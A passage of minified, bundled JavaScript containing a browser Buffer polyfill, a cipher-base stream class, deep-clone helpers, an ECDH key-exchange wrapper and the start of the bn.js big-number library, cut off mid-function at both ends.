Te=this.toString("hex",0,Le).replace(/(.{2})/g,"$1 ").trim(),this.length>Le&&(Te+=" ... "),"<Buffer "+Te+">"},$&&(F.prototype[$]=F.prototype.inspect),F.prototype.compare=function(Te,Le,$e,st,xt){if(lt(Te,Uint8Array)&&(Te=F.from(Te,Te.offset,Te.byteLength)),!F.isBuffer(Te))throw new TypeError('The "target" argument must be one of type Buffer or Uint8Array. Received type '+typeof Te);if(void 0===Le&&(Le=0),void 0===$e&&($e=Te?Te.length:0),void 0===st&&(st=0),void 0===xt&&(xt=this.length),Le<0||$e>Te.length||st<0||xt>this.length)throw new RangeError("out of range index");if(st>=xt&&Le>=$e)return 0;if(st>=xt)return-1;if(Le>=$e)return 1;if(this===Te)return 0;let pt=(xt>>>=0)-(st>>>=0),vt=($e>>>=0)-(Le>>>=0);const Wi=Math.min(pt,vt),Ft=this.slice(st,xt),zt=Te.slice(Le,$e);for(let fa=0;fa<Wi;++fa)if(Ft[fa]!==zt[fa]){pt=Ft[fa],vt=zt[fa];break}return pt<vt?-1:vt<pt?1:0},F.prototype.includes=function(Te,Le,$e){return-1!==this.indexOf(Te,Le,$e)},F.prototype.indexOf=function(Te,Le,$e){return ee(this,Te,Le,$e,!0)},F.prototype.lastIndexOf=function(Te,Le,$e){return ee(this,Te,Le,$e,!1)},F.prototype.write=function(Te,Le,$e,st){if(void 0===Le)st="utf8",$e=this.length,Le=0;else if(void 0===$e&&"string"==typeof Le)st=Le,$e=this.length,Le=0;else{if(!isFinite(Le))throw new Error("Buffer.write(string, encoding, offset[, length]) is no longer supported");Le>>>=0,isFinite($e)?($e>>>=0,void 0===st&&(st="utf8")):(st=$e,$e=void 0)}const xt=this.length-Le;if((void 0===$e||$e>xt)&&($e=xt),Te.length>0&&($e<0||Le<0)||Le>this.length)throw new RangeError("Attempt to write outside buffer bounds");st||(st="utf8");let pt=!1;for(;;)switch(st){case"hex":return ve(this,Te,Le,$e);case"utf8":case"utf-8":return le(this,Te,Le,$e);case"ascii":case"latin1":case"binary":return ye(this,Te,Le,$e);case"base64":return z(this,Te,Le,$e);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return l(this,Te,Le,$e);default:if(pt)throw new TypeError("Unknown encoding: "+st);st=(""+st).toLowerCase(),pt=!0}},F.prototype.toJSON=function(){return{type:"Buffer",data:Array.prototype.slice.call(this._arr||this,0)}};const v=4096;function G(Oe,Te,Le){let $e="";Le=Math.min(Oe.length,Le);for(let st=Te;st<Le;++st)$e+=String.fromCharCode(127&Oe[st]);return $e}function X(Oe,Te,Le){let $e="";Le=Math.min(Oe.length,Le);for(let st=Te;st<Le;++st)$e+=String.fromCharCode(Oe[st]);return $e}function L(Oe,Te,Le){const $e=Oe.length;(!Te||Te<0)&&(Te=0),(!Le||Le<0||Le>$e)&&(Le=$e);let st="";for(let xt=Te;xt<Le;++xt)st+=xe[Oe[xt]];return st}function h(Oe,Te,Le){const $e=Oe.slice(Te,Le);let st="";for(let xt=0;xt<$e.length-1;xt+=2)st+=String.fromCharCode($e[xt]+256*$e[xt+1]);return st}function R(Oe,Te,Le){if(Oe%1!=0||Oe<0)throw new RangeError("offset is not uint");if(Oe+Te>Le)throw new RangeError("Trying to access beyond buffer length")}function J(Oe,Te,Le,$e,st,xt){if(!F.isBuffer(Oe))throw new TypeError('"buffer" argument must be a Buffer instance');if(Te>st||Te<xt)throw new RangeError('"value" argument is out of bounds');if(Le+$e>Oe.length)throw new RangeError("Index out of range")}function Z(Oe,Te,Le,$e,st){De(Te,$e,st,Oe,Le,7);let xt=Number(Te&BigInt(4294967295));Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt;let pt=Number(Te>>BigInt(32)&BigInt(4294967295));return Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,Le}function ue(Oe,Te,Le,$e,st){De(Te,$e,st,Oe,Le,7);let xt=Number(Te&BigInt(4294967295));Oe[Le+7]=xt,xt>>=8,Oe[Le+6]=xt,xt>>=8,Oe[Le+5]=xt,xt>>=8,Oe[Le+4]=xt;let pt=Number(Te>>BigInt(32)&BigInt(4294967295));return Oe[Le+3]=pt,pt>>=8,Oe[Le+2]=pt,pt>>=8,Oe[Le+1]=pt,pt>>=8,Oe[Le]=pt,Le+8}function Ie(Oe,Te,Le,$e,st,xt){if(Le+$e>Oe.length)throw new RangeError("Index out of range");if(Le<0)throw new RangeError("Index out of range")}function Ae(Oe,Te,Le,$e,st){return Te=+Te,Le>>>=0,st||Ie(Oe,0,Le,4),j.write(Oe,Te,Le,$e,23,4),Le+4}function Ue(Oe,Te,Le,$e,st){return Te=+Te,Le>>>=0,st||Ie(Oe,0,Le,8),j.write(Oe,Te,Le,$e,52,8),Le+8}F.prototype.slice=function(Te,Le){const $e=this.length;(Te=~~Te)<0?(Te+=$e)<0&&(Te=0):Te>$e&&(Te=$e),(Le=void 0===Le?$e:~~Le)<0?(Le+=$e)<0&&(Le=0):Le>$e&&(Le=$e),Le<Te&&(Le=Te);const st=this.subarray(Te,Le);return Object.setPrototypeOf(st,F.prototype),st},F.prototype.readUintLE=F.prototype.readUIntLE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te],xt=1,pt=0;for(;++pt<Le&&(xt*=256);)st+=this[Te+pt]*xt;return st},F.prototype.readUintBE=F.prototype.readUIntBE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te+--Le],xt=1;for(;Le>0&&(xt*=256);)st+=this[Te+--Le]*xt;return st},F.prototype.readUint8=F.prototype.readUInt8=function(Te,Le){return Te>>>=0,Le||R(Te,1,this.length),this[Te]},F.prototype.readUint16LE=F.prototype.readUInt16LE=function(Te,Le){return Te>>>=0,Le||R(Te,2,this.length),this[Te]|this[Te+1]<<8},F.prototype.readUint16BE=F.prototype.readUInt16BE=function(Te,Le){return Te>>>=0,Le||R(Te,2,this.length),this[Te]<<8|this[Te+1]},F.prototype.readUint32LE=F.prototype.readUInt32LE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),(this[Te]|this[Te+1]<<8|this[Te+2]<<16)+16777216*this[Te+3]},F.prototype.readUint32BE=F.prototype.readUInt32BE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),16777216*this[Te]+(this[Te+1]<<16|this[Te+2]<<8|this[Te+3])},F.prototype.readBigUInt64LE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=Le+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,24),xt=this[++Te]+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+$e*Lo(2,24);return BigInt(st)+(BigInt(xt)<<BigInt(32))}),F.prototype.readBigUInt64BE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=Le*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+this[++Te],xt=this[++Te]*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+$e;return(BigInt(st)<<BigInt(32))+BigInt(xt)}),F.prototype.readIntLE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te],xt=1,pt=0;for(;++pt<Le&&(xt*=256);)st+=this[Te+pt]*xt;return xt*=128,st>=xt&&(st-=Math.pow(2,8*Le)),st},F.prototype.readIntBE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=Le,xt=1,pt=this[Te+--st];for(;st>0&&(xt*=256);)pt+=this[Te+--st]*xt;return xt*=128,pt>=xt&&(pt-=Math.pow(2,8*Le)),pt},F.prototype.readInt8=function(Te,Le){return Te>>>=0,Le||R(Te,1,this.length),128&this[Te]?-1*(255-this[Te]+1):this[Te]},F.prototype.readInt16LE=function(Te,Le){Te>>>=0,Le||R(Te,2,this.length);const $e=this[Te]|this[Te+1]<<8;return 32768&$e?4294901760|$e:$e},F.prototype.readInt16BE=function(Te,Le){Te>>>=0,Le||R(Te,2,this.length);const $e=this[Te+1]|this[Te]<<8;return 32768&$e?4294901760|$e:$e},F.prototype.readInt32LE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),this[Te]|this[Te+1]<<8|this[Te+2]<<16|this[Te+3]<<24},F.prototype.readInt32BE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),this[Te]<<24|this[Te+1]<<16|this[Te+2]<<8|this[Te+3]},F.prototype.readBigInt64LE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=this[Te+4]+this[Te+5]*Lo(2,8)+this[Te+6]*Lo(2,16)+($e<<24);return(BigInt(st)<<BigInt(32))+BigInt(Le+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,24))}),F.prototype.readBigInt64BE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=(Le<<24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+this[++Te];return(BigInt(st)<<BigInt(32))+BigInt(this[++Te]*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+$e)}),F.prototype.readFloatLE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),j.read(this,Te,!0,23,4)},F.prototype.readFloatBE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),j.read(this,Te,!1,23,4)},F.prototype.readDoubleLE=function(Te,Le){return Te>>>=0,Le||R(Te,8,this.length),j.read(this,Te,!0,52,8)},F.prototype.readDoubleBE=function(Te,Le){return Te>>>=0,Le||R(Te,8,this.length),j.read(this,Te,!1,52,8)},F.prototype.writeUintLE=F.prototype.writeUIntLE=function(Te,Le,$e,st){Te=+Te,Le>>>=0,$e>>>=0,st||J(this,Te,Le,$e,Math.pow(2,8*$e)-1,0);let xt=1,pt=0;for(this[Le]=255&Te;++pt<$e&&(xt*=256);)this[Le+pt]=Te/xt&255;return Le+$e},F.prototype.writeUintBE=F.prototype.writeUIntBE=function(Te,Le,$e,st){Te=+Te,Le>>>=0,$e>>>=0,st||J(this,Te,Le,$e,Math.pow(2,8*$e)-1,0);let xt=$e-1,pt=1;for(this[Le+xt]=255&Te;--xt>=0&&(pt*=256);)this[Le+xt]=Te/pt&255;return Le+$e},F.prototype.writeUint8=F.prototype.writeUInt8=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,1,255,0),this[Le]=255&Te,Le+1},F.prototype.writeUint16LE=F.prototype.writeUInt16LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,65535,0),this[Le]=255&Te,this[Le+1]=Te>>>8,Le+2},F.prototype.writeUint16BE=F.prototype.writeUInt16BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,65535,0),this[Le]=Te>>>8,this[Le+1]=255&Te,Le+2},F.prototype.writeUint32LE=F.prototype.writeUInt32LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,4294967295,0),this[Le+3]=Te>>>24,this[Le+2]=Te>>>16,this[Le+1]=Te>>>8,this[Le]=255&Te,Le+4},F.prototype.writeUint32BE=F.prototype.writeUInt32BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,4294967295,0),this[Le]=Te>>>24,this[Le+1]=Te>>>16,this[Le+2]=Te>>>8,this[Le+3]=255&Te,Le+4},F.prototype.writeBigUInt64LE=We(function(Te,Le=0){return Z(this,Te,Le,BigInt(0),BigInt("0xffffffffffffffff"))}),F.prototype.writeBigUInt64BE=We(function(Te,Le=0){return ue(this,Te,Le,BigInt(0),BigInt("0xffffffffffffffff"))}),F.prototype.writeIntLE=function(Te,Le,$e,st){if(Te=+Te,Le>>>=0,!st){const Wi=Math.pow(2,8*$e-1);J(this,Te,Le,$e,Wi-1,-Wi)}let xt=0,pt=1,vt=0;for(this[Le]=255&Te;++xt<$e&&(pt*=256);)Te<0&&0===vt&&0!==this[Le+xt-1]&&(vt=1),this[Le+xt]=(Te/pt>>0)-vt&255;return Le+$e},F.prototype.writeIntBE=function(Te,Le,$e,st){if(Te=+Te,Le>>>=0,!st){const Wi=Math.pow(2,8*$e-1);J(this,Te,Le,$e,Wi-1,-Wi)}let xt=$e-1,pt=1,vt=0;for(this[Le+xt]=255&Te;--xt>=0&&(pt*=256);)Te<0&&0===vt&&0!==this[Le+xt+1]&&(vt=1),this[Le+xt]=(Te/pt>>0)-vt&255;return Le+$e},F.prototype.writeInt8=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,1,127,-128),Te<0&&(Te=255+Te+1),this[Le]=255&Te,Le+1},F.prototype.writeInt16LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,32767,-32768),this[Le]=255&Te,this[Le+1]=Te>>>8,Le+2},F.prototype.writeInt16BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,32767,-32768),this[Le]=Te>>>8,this[Le+1]=255&Te,Le+2},F.prototype.writeInt32LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,2147483647,-2147483648),this[Le]=255&Te,this[Le+1]=Te>>>8,this[Le+2]=Te>>>16,this[Le+3]=Te>>>24,Le+4},F.prototype.writeInt32BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,2147483647,-2147483648),Te<0&&(Te=4294967295+Te+1),this[Le]=Te>>>24,this[Le+1]=Te>>>16,this[Le+2]=Te>>>8,this[Le+3]=255&Te,Le+4},F.prototype.writeBigInt64LE=We(function(Te,Le=0){return Z(this,Te,Le,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),F.prototype.writeBigInt64BE=We(function(Te,Le=0){return ue(this,Te,Le,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),F.prototype.writeFloatLE=function(Te,Le,$e){return Ae(this,Te,Le,!0,$e)},F.prototype.writeFloatBE=function(Te,Le,$e){return Ae(this,Te,Le,!1,$e)},F.prototype.writeDoubleLE=function(Te,Le,$e){return Ue(this,Te,Le,!0,$e)},F.prototype.writeDoubleBE=function(Te,Le,$e){return Ue(this,Te,Le,!1,$e)},F.prototype.copy=function(Te,Le,$e,st){if(!F.isBuffer(Te))throw new TypeError("argument should be a Buffer");if($e||($e=0),!st&&0!==st&&(st=this.length),Le>=Te.length&&(Le=Te.length),Le||(Le=0),st>0&&st<$e&&(st=$e),st===$e||0===Te.length||0===this.length)return 0;if(Le<0)throw new RangeError("targetStart out of bounds");if($e<0||$e>=this.length)throw new RangeError("Index out of range");if(st<0)throw new RangeError("sourceEnd out of bounds");st>this.length&&(st=this.length),Te.length-Le<st-$e&&(st=Te.length-Le+$e);const xt=st-$e;return this===Te&&"function"==typeof Uint8Array.prototype.copyWithin?this.copyWithin(Le,$e,st):Uint8Array.prototype.set.call(Te,this.subarray($e,st),Le),xt},F.prototype.fill=function(Te,Le,$e,st){if("string"==typeof Te){if("string"==typeof Le?(st=Le,Le=0,$e=this.length):"string"==typeof $e&&(st=$e,$e=this.length),void 0!==st&&"string"!=typeof st)throw new TypeError("encoding must be a string");if("string"==typeof st&&!F.isEncoding(st))throw new TypeError("Unknown encoding: "+st);if(1===Te.length){const pt=Te.charCodeAt(0);("utf8"===st&&pt<128||"latin1"===st)&&(Te=pt)}}else"number"==typeof Te?Te&=255:"boolean"==typeof Te&&(Te=Number(Te));if(Le<0||this.length<Le||this.length<$e)throw new RangeError("Out of range index");if($e<=Le)return this;let xt;if(Le>>>=0,$e=void 0===$e?this.length:$e>>>0,Te||(Te=0),"number"==typeof Te)for(xt=Le;xt<$e;++xt)this[xt]=Te;else{const pt=F.isBuffer(Te)?Te:F.from(Te,st),vt=pt.length;if(0===vt)throw new TypeError('The value "'+Te+'" is invalid for argument "value"');for(xt=0;xt<$e-Le;++xt)this[xt+Le]=pt[xt%vt]}return this};const Xe={};function He(Oe,Te,Le){Xe[Oe]=class extends Le{constructor(){super(),Object.defineProperty(this,"message",{value:Te.apply(this,arguments),writable:!0,configurable:!0}),this.name=`${this.name} [${Oe}]`,delete this.name}get code(){return Oe}set code(st){Object.defineProperty(this,"code",{configurable:!0,enumerable:!0,value:st,writable:!0})}toString(){return`${this.name} [${Oe}]: ${this.message}`}}}function Be(Oe){let Te="",Le=Oe.length;const $e="-"===Oe[0]?1:0;for(;Le>=$e+4;Le-=3)Te=`_${Oe.slice(Le-3,Le)}${Te}`;return`${Oe.slice(0,Le)}${Te}`}function De(Oe,Te,Le,$e,st,xt){if(Oe>Le||Oe<Te){const pt="bigint"==typeof Te?"n":"";let vt;throw vt=xt>3?0===Te||Te===BigInt(0)?`>= 0${pt} and < 2${pt} ** ${8*(xt+1)}${pt}`:`>= -(2${pt} ** ${8*(xt+1)-1}${pt}) and < 2 ** ${8*(xt+1)-1}${pt}`:`>= ${Te}${pt} and <= ${Le}${pt}`,new Xe.ERR_OUT_OF_RANGE("value",vt,Oe)}!function qe(Oe,Te,Le){Ve(Te,"offset"),(void 0===Oe[Te]||void 0===Oe[Te+Le])&&ze(Te,Oe.length-(Le+1))}($e,st,xt)}function Ve(Oe,Te){if("number"!=typeof Oe)throw new Xe.ERR_INVALID_ARG_TYPE(Te,"number",Oe)}function ze(Oe,Te,Le){throw Math.floor(Oe)!==Oe?(Ve(Oe,Le),new Xe.ERR_OUT_OF_RANGE(Le||"offset","an integer",Oe)):Te<0?new Xe.ERR_BUFFER_OUT_OF_BOUNDS:new Xe.ERR_OUT_OF_RANGE(Le||"offset",`>= ${Le?1:0} and <= ${Te}`,Oe)}He("ERR_BUFFER_OUT_OF_BOUNDS",function(Oe){return Oe?`${Oe} is outside of buffer bounds`:"Attempt to access memory outside buffer bounds"},RangeError),He("ERR_INVALID_ARG_TYPE",function(Oe,Te){return`The "${Oe}" argument must be of type number. Received type ${typeof Te}`},TypeError),He("ERR_OUT_OF_RANGE",function(Oe,Te,Le){let $e=`The value of "${Oe}" is out of range.`,st=Le;return Number.isInteger(Le)&&Math.abs(Le)>Lo(2,32)?st=Be(String(Le)):"bigint"==typeof Le&&(st=String(Le),(Le>Lo(BigInt(2),BigInt(32))||Le<-Lo(BigInt(2),BigInt(32)))&&(st=Be(st)),st+="n"),$e+=` It must be ${Te}. Received ${st}`,$e},RangeError);const me=/[^+/0-9A-Za-z-_]/g;function rt(Oe,Te){let Le;Te=Te||1/0;const $e=Oe.length;let st=null;const xt=[];for(let pt=0;pt<$e;++pt){if(Le=Oe.charCodeAt(pt),Le>55295&&Le<57344){if(!st){if(Le>56319){(Te-=3)>-1&&xt.push(239,191,189);continue}if(pt+1===$e){(Te-=3)>-1&&xt.push(239,191,189);continue}st=Le;continue}if(Le<56320){(Te-=3)>-1&&xt.push(239,191,189),st=Le;continue}Le=65536+(st-55296<<10|Le-56320)}else st&&(Te-=3)>-1&&xt.push(239,191,189);if(st=null,Le<128){if((Te-=1)<0)break;xt.push(Le)}else if(Le<2048){if((Te-=2)<0)break;xt.push(Le>>6|192,63&Le|128)}else if(Le<65536){if((Te-=3)<0)break;xt.push(Le>>12|224,Le>>6&63|128,63&Le|128)}else{if(!(Le<1114112))throw new Error("Invalid code point");if((Te-=4)<0)break;xt.push(Le>>18|240,Le>>12&63|128,Le>>6&63|128,63&Le|128)}}return xt}function ht(Oe){return ie.toByteArray(function Ke(Oe){if((Oe=(Oe=Oe.split("=")[0]).trim().replace(me,"")).length<2)return"";for(;Oe.length%4!=0;)Oe+="=";return Oe}(Oe))}function mt(Oe,Te,Le,$e){let st;for(st=0;st<$e&&!(st+Le>=Te.length||st>=Oe.length);++st)Te[st+Le]=Oe[st];return st}function lt(Oe,Te){return Oe instanceof Te||null!=Oe&&null!=Oe.constructor&&null!=Oe.constructor.name&&Oe.constructor.name===Te.name}function ft(Oe){return Oe!=Oe}const xe=function(){const Oe="0123456789abcdef",Te=new Array(256);for(let Le=0;Le<16;++Le){const $e=16*Le;for(let st=0;st<16;++st)Te[$e+st]=Oe[Le]+Oe[st]}return Te}();function We(Oe){return"undefined"==typeof BigInt?Je:Oe}function Je(){throw new Error("BigInt not supported")}},4003:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(4893).Transform,$=de(5741).s;function I(Q){j.call(this),this.hashMode="string"==typeof Q,this.hashMode?this[Q]=this._finalOrDigest:this.final=this._finalOrDigest,this._final&&(this.__final=this._final,this._final=null),this._decoder=null,this._encoding=null}de(2270)(I,j),I.prototype.update=function(Q,F,E){"string"==typeof Q&&(Q=ie.from(Q,F));var g=this._update(Q);return this.hashMode?this:(E&&(g=this._toString(g,E)),g)},I.prototype.setAutoPadding=function(){},I.prototype.getAuthTag=function(){throw new Error("trying to get auth tag in unsupported state")},I.prototype.setAuthTag=function(){throw new Error("trying to set auth tag in unsupported state")},I.prototype.setAAD=function(){throw new Error("trying to set aad in unsupported state")},I.prototype._transform=function(Q,F,E){var g;try{this.hashMode?this._update(Q):this.push(this._update(Q))}catch(b){g=b}finally{E(g)}},I.prototype._flush=function(Q){var F;try{this.push(this.__final())}catch(E){F=E}Q(F)},I.prototype._finalOrDigest=function(Q){var F=this.__final()||ie.alloc(0);return Q&&(F=this._toString(F,Q,!0)),F},I.prototype._toString=function(Q,F,E){if(this._decoder||(this._decoder=new $(F),this._encoding=F),this._encoding!==F)throw new Error("can't switch encodings");var g=this._decoder.write(Q);return E&&(g+=this._decoder.end()),g},Pe.exports=I},4730:(Pe,we,de)=>{"use strict";const ie=de(7856),j=de(7374),$=de(9045);Pe.exports=function ae(F,E){switch(j(F)){case"object":return function I(F,E){if("function"==typeof E)return E(F);if(E||$(F)){const g=new F.constructor;for(let b in F)g[b]=ae(F[b],E);return g}return F}(F,E);case"array":return function Q(F,E){const g=new F.constructor(F.length);for(let b=0;b<F.length;b++)g[b]=ae(F[b],E);return g}(F,E);default:return ie(F)}}},9045:(Pe,we,de)=>{"use strict";var ie=de(7729);function j($){return!0===ie($)&&"[object Object]"===Object.prototype.toString.call($)}Pe.exports=function(ae){var I,Q;return!(!1===j(ae)||(I=ae.constructor,"function"!=typeof I)||(Q=I.prototype,!1===j(Q))||!1===Q.hasOwnProperty("isPrototypeOf"))}},4707:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(1875),$=de(8752);Pe.exports=function(E){return new I(E)};var ae={secp256k1:{name:"secp256k1",byteLength:32},secp224r1:{name:"p224",byteLength:28},prime256v1:{name:"p256",byteLength:32},prime192v1:{name:"p192",byteLength:24},ed25519:{name:"ed25519",byteLength:32},secp384r1:{name:"p384",byteLength:48},secp521r1:{name:"p521",byteLength:66}};function I(F){this.curveType=ae[F],this.curveType||(this.curveType={name:F}),this.curve=new j.ec(this.curveType.name),this.keys=void 0}function Q(F,E,g){Array.isArray(F)||(F=F.toArray());var b=new ie(F);if(g&&b.length<g){var _=new ie(g-b.length);_.fill(0),b=ie.concat([_,b])}return E?b.toString(E):b}ae.p224=ae.secp224r1,ae.p256=ae.secp256r1=ae.prime256v1,ae.p192=ae.secp192r1=ae.prime192v1,ae.p384=ae.secp384r1,ae.p521=ae.secp521r1,I.prototype.generateKeys=function(F,E){return this.keys=this.curve.genKeyPair(),this.getPublicKey(F,E)},I.prototype.computeSecret=function(F,E,g){return E=E||"utf8",ie.isBuffer(F)||(F=new ie(F,E)),Q(this.curve.keyFromPublic(F).getPublic().mul(this.keys.getPrivate()).getX(),g,this.curveType.byteLength)},I.prototype.getPublicKey=function(F,E){var g=this.keys.getPublic("compressed"===E,!0);return"hybrid"===E&&(g[0]=g[g.length-1]%2?7:6),Q(g,F)},I.prototype.getPrivateKey=function(F){return Q(this.keys.getPrivate(),F)},I.prototype.setPublicKey=function(F,E){return E=E||"utf8",ie.isBuffer(F)||(F=new ie(F,E)),this.keys._importPublic(F),this},I.prototype.setPrivateKey=function(F,E){E=E||"utf8",ie.isBuffer(F)||(F=new ie(F,E));var g=new $(F);return g=g.toString(16),this.keys=this.curve.genKeyPair(),this.keys._importPrivate(g),this}},8752:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(8623).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var 